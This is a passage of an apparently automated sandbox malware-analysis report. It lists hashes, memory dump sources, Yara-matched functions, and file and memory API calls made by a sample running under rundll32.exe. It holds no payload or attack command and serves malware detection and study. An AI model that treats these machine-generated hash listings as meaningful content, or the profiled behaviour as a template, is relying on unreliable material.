                                                                                            • Opcode Fuzzy Hash: 6e4ed76cfe24963bbcc3ba10eec6ed2d69731cbf9e36515371d3bde3a7c42172
                                                                                            • Instruction Fuzzy Hash: 369002E1201144924601A2A98404B1A850697E0341B52C026F2044560CC5658852F175
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AEAD30, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: be55c471bac74ffa1124c89b767e203e56d5e4ea1d83e785960e285359050988
                                                                                            • Instruction ID: b070b0663f908f118f2f83691b6cb61a0cd140bb79712fe2d6bd8bda2b10e790
                                                                                            • Opcode Fuzzy Hash: be55c471bac74ffa1124c89b767e203e56d5e4ea1d83e785960e285359050988
                                                                                            • Instruction Fuzzy Hash: 90900271A0500412924171A948146568007A7E0781B56C021B1504554C89948A56B3E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9560, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a5a9b5528edcdf5607c14a41c894ccaa94d2efcd8b01747af5bf01c966407d12
                                                                                            • Instruction ID: bd9b8bc58ce4fa3048e5f45508ba8df9731506c408a65d04ac38454829cd1702
                                                                                            • Opcode Fuzzy Hash: a5a9b5528edcdf5607c14a41c894ccaa94d2efcd8b01747af5bf01c966407d12
                                                                                            • Instruction Fuzzy Hash: AE900265221004020246A5A9060451B4446A7D6391392C025F2406590CC6618866B361
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE96D0, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5337ca8da0862dbe33e2bf79f177ac706192c50f89766a6e6dd4b6855eecce6b
                                                                                            • Instruction ID: 43bbb7bedecd5a75bede21d60509fc8df22fe736fb1cd7dd32dab15989a6409a
                                                                                            • Opcode Fuzzy Hash: 5337ca8da0862dbe33e2bf79f177ac706192c50f89766a6e6dd4b6855eecce6b
                                                                                            • Instruction Fuzzy Hash: B190027120100C42D20161A94404B56400697E0341F52C026B1114654D8655C852B561
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9610, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93c55c7ec22b346dbe21736f34fc0697da42938159868033b5a8802b46e73bad
                                                                                            • Instruction ID: 74d614dcb4918a7d7a6b05f5797220a722768c035d9b1ed315461e70e6d523ad
                                                                                            • Opcode Fuzzy Hash: 93c55c7ec22b346dbe21736f34fc0697da42938159868033b5a8802b46e73bad
                                                                                            • Instruction Fuzzy Hash: 5C90027160500C02D25171A94414756400697D0341F52C021B1014654D87958A56B6E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9650, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9cbe75bca0ef544f8ecf3e0a54d26c986fcc06117e72390e12c51093fb694926
                                                                                            • Instruction ID: 340394ab60ede07f9c0e0be275bf0d594e820872317c87151ed053d1aea6533e
                                                                                            • Opcode Fuzzy Hash: 9cbe75bca0ef544f8ecf3e0a54d26c986fcc06117e72390e12c51093fb694926
                                                                                            • Instruction Fuzzy Hash: 4E90027120504C42D24171A94404A56401697D0345F52C021B1054694D96658D56F6A1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9730, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 195b2aa84645bad7817522f0d7af9736141dba50dd3067735dee32a221962c45
                                                                                            • Instruction ID: a9a34d144a8040c30e32333a4c9945a2a3312f644431397d9710d4d46427b75a
                                                                                            • Opcode Fuzzy Hash: 195b2aa84645bad7817522f0d7af9736141dba50dd3067735dee32a221962c45
                                                                                            • Instruction Fuzzy Hash: 2E90026160500802D24171A95418716401697D0341F52D021B1014554DC6998A56B6E1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AEA710, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5c0715d5968f1aaa6b5c57a50f622c2a55279dc09c4a2ed8c8a31884d722a5a8
                                                                                            • Instruction ID: f41e4b67194b9201480da6346b268949f8198ec24fbf19014f215835caef326e
                                                                                            • Opcode Fuzzy Hash: 5c0715d5968f1aaa6b5c57a50f622c2a55279dc09c4a2ed8c8a31884d722a5a8
                                                                                            • Instruction Fuzzy Hash: 10900271301004529601A6E95804A5A810697F0341B52D025B5004554C85948862B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9760, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b54f5abade96394dc63842ab7b4804a9e5ef82615a24f0475666e0d7c81a279
                                                                                            • Instruction ID: d62dadfcdfb8730d9aad4c1fdc5d534e8c7ba074ef264ce26d2c7cc2feeae96f
                                                                                            • Opcode Fuzzy Hash: 2b54f5abade96394dc63842ab7b4804a9e5ef82615a24f0475666e0d7c81a279
                                                                                            • Instruction Fuzzy Hash: EC90027120100803D20161A95508717400697D0341F52D421B1414558DD6968852B161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9770, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68cacc571963893936742263d49218bfbf0314479248cc704410c9ec96fef7cc
                                                                                            • Instruction ID: 6ad3e03b3320010eb7f292594afa94aff4d20a95a73da68ff9087d62d543f148
                                                                                            • Opcode Fuzzy Hash: 68cacc571963893936742263d49218bfbf0314479248cc704410c9ec96fef7cc
                                                                                            • Instruction Fuzzy Hash: 9690026120504842D20165A95408A16400697D0345F52D021B2054595DC6758852F171
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AEA770, Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 211a17f5b5769c5d10df8249757de475b6eadde93bd002679f0661842068de7a
                                                                                            • Instruction ID: e7b9f6950157003ca2f790809d44b3ed88f302048b921e2eee2cc4ba07427a82
                                                                                            • Opcode Fuzzy Hash: 211a17f5b5769c5d10df8249757de475b6eadde93bd002679f0661842068de7a
                                                                                            • Instruction Fuzzy Hash: E690027520504842D60165A95804A97400697D0345F52D421B141459CD86948862F161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00AE9670, Relevance: .0, Instructions: 2COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction ID: b3262ad4bcc459bd6208b65a887e7204b1a64f623695a31a4bf6da246e9ba6a3
                                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                            • Instruction Fuzzy Hash:
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00B3FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 53%
                                                                                            			E00B3FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00AECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                            0x00b3fdda
                                                                                            0x00b3fde2
                                                                                            0x00b3fde5
                                                                                            0x00b3fdec
                                                                                            0x00b3fdfa
                                                                                            0x00b3fdff
                                                                                            0x00b3fe0a
                                                                                            0x00b3fe0f
                                                                                            0x00b3fe17
                                                                                            0x00b3fe1e
                                                                                            0x00b3fe19
                                                                                            0x00b3fe19
                                                                                            0x00b3fe19
                                                                                            0x00b3fe20
                                                                                            0x00b3fe21
                                                                                            0x00b3fe22
                                                                                            0x00b3fe25
                                                                                            0x00b3fe40

                                                                                            APIs
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B3FDFA
                                                                                            Strings
                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B3FE01
                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B3FE2B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.326420559.0000000000A80000.00000040.00000001.sdmp, Offset: 00A80000, based on PE: true
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                            • API String ID: 885266447-3903918235
                                                                                            • Opcode ID: e37b7fcaa34fa3de5b4089e18e97ff3fc832a359e50e3eba410e75ba1edc8ef6
                                                                                            • Instruction ID: 77013f54c008fa7424a0073257ea39f278b363b44a53ed8f5b1c7238f42947de
                                                                                            • Opcode Fuzzy Hash: e37b7fcaa34fa3de5b4089e18e97ff3fc832a359e50e3eba410e75ba1edc8ef6
                                                                                            • Instruction Fuzzy Hash: DFF0F032640601BFEA201A45DC02F33BBAAEB84730F240354F628561E2EA62FC2097F0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Analysis Process: rundll32.exe PID: 1744 Parent PID: 3352 rundll32.exeCOMMON

                                                                                            Executed Functions

                                                                                            Function 0105FA99, Relevance: 4.6, APIs: 3, Instructions: 104fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 0105FB6F
                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0105FBAE
                                                                                            • FindClose.KERNEL32(?), ref: 0105FBB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: e7cd287f617ac5de57a9120a6fcacf01f24d2e8c1fab5c9e50cc79461be62ed9
                                                                                            • Instruction ID: 097b071de0245075727451ecd35b9e1ef75a13d1af0ce40a2478dda17216b2c1
                                                                                            • Opcode Fuzzy Hash: e7cd287f617ac5de57a9120a6fcacf01f24d2e8c1fab5c9e50cc79461be62ed9
                                                                                            • Instruction Fuzzy Hash: 0D3187B1900309BBEB61DF64CC85FEB77BCAF95704F14459CB989A7180D674AA84CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0105FAA0, Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNEL32(?,00000000), ref: 0105FB6F
                                                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 0105FBAE
                                                                                            • FindClose.KERNEL32(?), ref: 0105FBB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 3541575487-0
                                                                                            • Opcode ID: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                            • Instruction ID: 54d6ba4bb07a5d8b36875b9b1359a35a9fd9e8fe517a6681449a1ef30f6845fc
                                                                                            • Opcode Fuzzy Hash: 94ac2383ed33b1ff8722f515b1c9270529150a0752c82e9c8a819ec8a924b7c1
                                                                                            • Instruction Fuzzy Hash: CA318971900309BBEB61DF64CC45FEB77BCAF94704F14459CB989A7180D674AA848BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010685EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,01063BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01063BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0106863D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: .z`
                                                                                            • API String ID: 823142352-1441809116
                                                                                            • Opcode ID: d2888c3a2a20148a8ae84b18b8b9c320057423898107eb8fc0c5c7ffa04a6568
                                                                                            • Instruction ID: fdf1b13cdfc5305b319f54b6b1e95548163ef27926b7515e044beac15ac54a20
                                                                                            • Opcode Fuzzy Hash: d2888c3a2a20148a8ae84b18b8b9c320057423898107eb8fc0c5c7ffa04a6568
                                                                                            • Instruction Fuzzy Hash: 6501AFB2241108AFCB48CF98DC85EEB77ADEF8C354F158259FA0D97251C630E851CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010685F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,01063BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,01063BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0106863D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: .z`
                                                                                            • API String ID: 823142352-1441809116
                                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                            • Instruction ID: b657311bb2addfbe37e4a9859c071acd6f7107d540dac4fe5cd98a5af3a54ccb
                                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                            • Instruction Fuzzy Hash: 7FF0BDB2200208AFCB08CF88DC84EEB77EDAF8C754F158248BA0D97241C630E811CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0106871A, Relevance: 3.0, APIs: 2, Instructions: 44nativefileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(01063D82,5E972F65,FFFFFFFF,01063A41,?,?,01063D82,?,01063A41,FFFFFFFF,5E972F65,01063D82,?,00000000), ref: 010686E5
                                                                                            • NtClose.NTDLL(01063D60,?,?,01063D60,00000000,FFFFFFFF), ref: 01068745
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseFileRead
                                                                                            • String ID:
                                                                                            • API String ID: 752142053-0
                                                                                            • Opcode ID: 409f64dc0a89c125009741b0e20e1dd75ee0425fa37babb6c62d731b481a4411
                                                                                            • Instruction ID: e58700ee3c5661ac8db33bb358fca12811b8b1c18c557ee296ab143724bd53de
                                                                                            • Opcode Fuzzy Hash: 409f64dc0a89c125009741b0e20e1dd75ee0425fa37babb6c62d731b481a4411
                                                                                            • Instruction Fuzzy Hash: 72F014B2200119ABDB14EF98DC80EEB77ADFF8C350F148659FA5C9B241D630E9118BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0106869A, Relevance: 1.5, APIs: 1, Instructions: 39filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(01063D82,5E972F65,FFFFFFFF,01063A41,?,?,01063D82,?,01063A41,FFFFFFFF,5E972F65,01063D82,?,00000000), ref: 010686E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: e3c4423e2bcefc107261032504101a14433efa351e4752c1f08714bffec4a782
                                                                                            • Instruction ID: ba108896ca41f4b04450e8cc26d6dc36cf69028c07f1c04b9ec60ab375e1da64
                                                                                            • Opcode Fuzzy Hash: e3c4423e2bcefc107261032504101a14433efa351e4752c1f08714bffec4a782
                                                                                            • Instruction Fuzzy Hash: 08F0E2B2200208ABDB14DF88DC80EEB77A9BF8C754F118248FE1D97241CA30E8118BA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010686A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(01063D82,5E972F65,FFFFFFFF,01063A41,?,?,01063D82,?,01063A41,FFFFFFFF,5E972F65,01063D82,?,00000000), ref: 010686E5
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                            • Instruction ID: ba96d67f494209af1f7bbed80082f24a7880f8e2868a9cdaa44fb851ca3e18c1
                                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                            • Instruction Fuzzy Hash: 83F0A4B2200208AFCB14DF89DC84EEB77ADAF8C754F158248BE1D97241D630E811CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010687CA, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01052D11,00002000,00003000,00000004), ref: 01068809
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: b97810a7ea5e0e57d66fe31015f1ca2eba385e23083eea72046b55d8b2c4f821
                                                                                            • Instruction ID: 25bdd299c266d5685fc7b7c0e45d1593f54108e40e06c305ce9270ada1093ae1
                                                                                            • Opcode Fuzzy Hash: b97810a7ea5e0e57d66fe31015f1ca2eba385e23083eea72046b55d8b2c4f821
                                                                                            • Instruction Fuzzy Hash: 71F034B2200208AFCB14CF88CC80EA777A9AF88310F10865CBA489B240C230E811CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 010687D0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,01052D11,00002000,00003000,00000004), ref: 01068809
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                            • Instruction ID: aebe3354a002855f582889cf8bf9710e8b5362ce22528f241e889ccdfe2c25a9
                                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                            • Instruction Fuzzy Hash: 1CF015B2200208AFCB14DF89CC80EEB77ADAF88754F118148BE0897241C630F810CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 01068720, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • NtClose.NTDLL(01063D60,?,?,01063D60,00000000,FFFFFFFF), ref: 01068745
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.799183842.0000000001050000.00000040.00020000.sdmp, Offset: 01050000, based on PE: false
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                            • Instruction ID: b7229c3cf424d41f20f82f75ce9045845794034fff03df176fb4df8ec31f881f
                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                            • Instruction Fuzzy Hash: 3AD01776200218ABD710EB98CC89EE77BACEF48760F154499BA589B242C530FA0086E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: e1a07f145f04484e8c82757216a7a5e93a07a7dcac5a0c702e67e8faf2899fc7
                                                                                            • Instruction ID: c01302464d230d5d1845de93c1455d6cd5df4247419248e9401a29738cd8bbc5
                                                                                            • Opcode Fuzzy Hash: e1a07f145f04484e8c82757216a7a5e93a07a7dcac5a0c702e67e8faf2899fc7
                                                                                            • Instruction Fuzzy Hash: 749002B520110402D54471598444B56002597D0341F91C421E5094558E86998DD576A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 05379540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: f8d272d07d41d4f71e6bf09d5aab6d2f8c1926b0233b460cc2978f78762296c2
                                                                                            • Instruction ID: cf7ea815108c88760b68e6c5f7deb5bfa89fe68b85dff9d77f2403030f093676
                                                                                            • Opcode Fuzzy Hash: f8d272d07d41d4f71e6bf09d5aab6d2f8c1926b0233b460cc2978f78762296c2
                                                                                            • Instruction Fuzzy Hash: D2900269211100030509B5594744917006697D5391391C431F1045554CD66188616161
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 053799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 43568d6720f812abe0b52228ce85dbbfd7b1694b6477b83efe7d178bac68838b
                                                                                            • Instruction ID: c03099ba211cbb9e1745d13e623baefd258f066b5574b83e0f8a8c9726ff1ade
                                                                                            • Opcode Fuzzy Hash: 43568d6720f812abe0b52228ce85dbbfd7b1694b6477b83efe7d178bac68838b
                                                                                            • Instruction Fuzzy Hash: 439002A534110442D50471598454F160025D7E1341F91C425E1094558D8659CC527166
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 053795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.802324824.0000000005310000.00000040.00000001.sdmp, Offset: 05310000, based on PE: true
                                                                                            • Associated: 0000000D.00000002.802547203.000000000542B000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000D.00000002.802558285.000000000542F000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 4814d30a40b0812be402628be79b021a991cbd269535e5c113ac4e6af559a0a6
                                                                                            • Instruction ID: eca10558401c8df6c2a64c1fbc437a1c63c281cf818ff75c037bcc5e780cc451
                                                                                            • Opcode Fuzzy Hash: 4814d30a40b0812be402628be79b021a991cbd269535e5c113ac4e6af559a0a6
                                                                                            • Instruction Fuzzy Hash: 969002A520210003450971598454A26402A97E0241B91C431E1044594DC56588917165
                                                                                            Uniqueness

